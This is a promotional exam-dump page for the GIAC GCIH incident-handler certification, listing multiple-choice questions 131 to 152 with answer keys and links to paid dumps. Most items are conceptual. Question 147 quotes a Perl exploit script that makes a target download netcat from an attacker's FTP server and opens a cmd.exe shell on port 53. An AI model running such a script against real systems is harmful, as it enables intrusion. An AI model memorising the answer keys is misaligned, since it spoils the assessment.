[Oct-2021] Free GCIH Exam Questions GCIH Actual Free Exam Questions [Q131-Q152]

[Oct-2021] Free GCIH Exam Questions GCIH Actual Free Exam Questions

Verified GCIH dumps and 335 unique questions

Preparation Resources for GCIH Certification Test

A candidate who identifies and uses different preparation resources has a higher chance to pass the GIAC GCIH exam than one individual who doesn’t do so. Therefore, those individuals who want to clear the GCIH test can use the following training resources:

• SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling

  This training course lasts for 6 days and it can be taken either online or in the classroom. It is conducted by Michael Murr as Principal Instructor and Joshua Wright as the Fellow. During this official class, the candidates will learn about the following concepts:

  • Preparing most effectively for preventing a security breach;
  • Developing reactive and preventive defense methods;
  • Identifying immediately any active attacks and knowing how to understand the compromises;
  • Understanding how to stop different types of the computer attack vector;
  • Developing different measures that block attackers from returning;
  • Learning how to recover from attacks and restoring the systems to avoid business disruptions;
  • Using and understanding how different types of hacking techniques and tools work;
  • Developing strategies that help in preventing any hacking attacks;
  • Discovering vulnerabilities, defenses, and attacks;
  • Understanding how to handle the legal issues when it comes to handling incidents.
• GCIH GIAC Certified Incident Handler All-in-One Exam Guide, 1st Edition

  This book has been written by Nick Mitropoulos and is available on Amazon in different formats. The candidates can download it in Kindle format for $34.67 or choose the paperback format for $36.49. This material helps you prepare for the challenging exam necessary for getting the GIAC Certified Incident Handler certification and offers detailed information according to the exam blueprint. To know more, the author is a reputable cybersecurity expert who knows the tips and tricks that the candidates should care about when they take the GCIH exam. Plus, such material includes 300 questions offering the exam-takers the opportunity to get used to the exam structure and difficulty level. In particular, this resource offers the candidates the opportunity to learn about the following topics:

  • How to handle incidents and intrusion analysis;
  • The way to gather different types of information;
  • How to identify vulnerabilities through scanning and enumeration;
  • Means to exploit vulnerabilities;
  • Preventing and defending against endpoint and infrastructure attacks;
  • Managing and defending against Network, Web application, and DoS attacks;
  • How to cover tracks and evade detection;
  • Learning how to work with botnets, bots, and worms.

  Another important advantage brought by this material is the fact that each chapter ends with a detailed explanation of the exam domains and puts the candidates in real-world scenarios. So, the exam-takers will consolidate their skills and obtain a lot of practical experience.

 

NEW QUESTION 131
You work as a Senior Marketing Manager for Umbrella Inc. You find out that some of the software applications on the systems were malfunctioning and also you were not able to access your remote desktop session. You suspected that some malicious attack was performed on the network of the company. You immediately called the incident response team to handle the situation who enquired the Network Administrator to acquire all relevant information regarding the malfunctioning. The Network Administrator informed the incident response team that he was reviewing the security of the network which caused all these problems. Incident response team announced that this was a controlled event not an incident.
Which of the following steps of an incident handling process was performed by the incident response team?

• A. Containment
• B. Identification
• C. Eradication
• D. Preparation

Answer: B

Explanation:
Section: Volume C

 

NEW QUESTION 132
You are concerned about rootkits on your network communicating with attackers outside your network. Without
using an IDS how can you detect this sort of activity?

• A. By examining your firewall logs.
• B. By examining your domain controller server logs.
• C. By setting up a DMZ.
• D. You cannot, you need an IDS.

Answer: A

 

NEW QUESTION 133
Which of the following tools is described in the statement given below?
"It has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and
commonly used web CGI scripts. Moreover, the database detects DdoS zombies and Trojans as well."

• A. Anti-x
• B. SARA
• C. Nmap
• D. Nessus

Answer: D

 

NEW QUESTION 134
Which of the following malicious software travels across computer networks without the assistance of a user?

• A. Virus
• B. Worm
• C. Trojan horses
• D. Hoax

Answer: B

 

NEW QUESTION 135
Which of the following virus is a script that attaches itself to a file or template?

• A. E-mail virus
• B. Macro virus
• C. Trojan horse
• D. Boot sector

Answer: B

 

NEW QUESTION 136
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

• A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
• B. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
• C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
• D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: B

 

NEW QUESTION 137
Adam, a malicious hacker is running a scan. Statistics of the scan is as follows:
Scan directed at open port: ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23192.5.2.92:4079 <----NO RESPONSE--
---192.5.2.110:23
Scan directed at closed port:
ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23
192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
Which of the following types of port scan is Adam running?

• A. Idle scan
• B. XMAS scan
• C. ACK scan
• D. FIN scan

Answer: D

 

NEW QUESTION 138
John works as an Ethical Hacker for PassGuide Inc. He wants to find out the ports that are open in PassGuide's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

• A. TCP FIN
• B. Xmas tree
• C. TCP SYN/ACK
• D. TCP SYN

Answer: D

 

NEW QUESTION 139
Adam works as a Security Administrator for Umbrella Technology Inc. He reported a breach in security to his senior members, stating that "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 50,000 addresses containing customer credit cards and passwords. Umbrella Technology was looking to law enforcement officials to protect their intellectual property.
The intruder entered through an employee's home machine, which was connected to Umbrella Technology's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge.
The hackers were traced back to Shanghai, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Umbrella Technology's network from a remote location, posing as employees.
Which of the following actions can Adam perform to prevent such attacks from occurring in future?

• A. Replace the VPN access with dial-up modem access to the company's network
• B. Apply different security policy to make passwords of employees more complex
• C. Disable VPN access to all employees of the company from home machines
• D. Allow VPN access but replace the standard authentication with biometric authentication

Answer: C

Explanation:
Section: Volume C

 

NEW QUESTION 140
Maria works as the Chief Security Officer for PassGuide Inc. She wants to send secret messages to the CEO of the
company. To secure these messages, she uses a technique of hiding a secret message within an ordinary message. The
technique provides 'security through obscurity'. What technique is Maria using?

• A. Public-key cryptography
• B. Encryption
• C. Steganography
• D. RSA algorithm

Answer: C

 

NEW QUESTION 141
Which of the following provides packet-level encryption between hosts in a LAN?

• A. PFS
• B. Tunneling protocol
• C. PPTP
• D. IPsec

Answer: D

 

NEW QUESTION 142
Which of the following is the difference between SSL and S-HTTP?

• A. SSL operates at the application layer and S-HTTP operates at the network layer.
• B. SSL operates at the application layer and S-HTTP operates at the transport layer.
• C. SSL operates at the network layer and S-HTTP operates at the application layer.
• D. SSL operates at the transport layer and S-HTTP operates at the application layer.

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 143
You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?

• A. SubSeven
• B. Tripwire
• C. Netstat
• D. Fport

Answer: D

Explanation:
Section: Volume A
Explanation

 

NEW QUESTION 144
In which of the following attacks does an attacker create the IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system?

• A. Polymorphic shell code attack
• B. Cross-site request forgery
• C. IP address spoofing
• D. Rainbow attack

Answer: C

 

NEW QUESTION 145
Which of the following viruses/worms uses the buffer overflow attack?

• A. Chernobyl (CIH) virus
• B. Klez worm
• C. Nimda virus
• D. Code red worm

Answer: D

 

NEW QUESTION 146
What is the major difference between a worm and a Trojan horse?

• A. A worm spreads via e-mail, while a Trojan horse does not.
• B. A Trojan horse is a malicious program, while a worm is an anti-virus software.
• C. A worm is a form of malicious program, while a Trojan horse is a utility.
• D. A worm is self replicating, while a Trojan horse is not.

Answer: D

 

NEW QUESTION 147
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -
h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?

• A. Creates a share called "sasfile" on the target system
• B. Creates an FTP server with write permissions enabled
• C. Opens up a SMTP server that requires no username or password
• D. Opens up a telnet listener that requires no username or password

Answer: D

 

NEW QUESTION 148
John works as an Ethical Hacker for PassGuide Inc. He wants to find out the ports that are open in PassGuide's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

• A. TCP FIN
• B. Xmas tree
• C. TCP SYN/ACK
• D. TCP SYN

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 149
Which of the following protocol loggers is used to detect ping sweep?

• A. lppi
• B. ippl
• C. pitl
• D. dpsl

Answer: B

 

NEW QUESTION 150
Which of the following programming languages are NOT vulnerable to buffer overflow attacks?
Each correct answer represents a complete solution. Choose two.

• A. Perl
• B. C++
• C. Java
• D. C

Answer: A,C

 

NEW QUESTION 151
Which of the following are based on malicious code?
Each correct answer represents a complete solution. Choose two.

• A. Worm
• B. Biometrics
• C. Trojan horse
• D. Denial-of-Service (DoS)

Answer: A,C

 

NEW QUESTION 152
......

Latest 100% Passing Guarantee - Brilliant GCIH Exam Questions PDF: https://www.torrentvce.com/GCIH-valid-vce-collection.html

GCIH Dumps for Pass Guaranteed - Pass GCIH Exam: https://drive.google.com/open?id=1NQ9pOfU7j8dcwzKkkbPwPXhl37gOU5Uf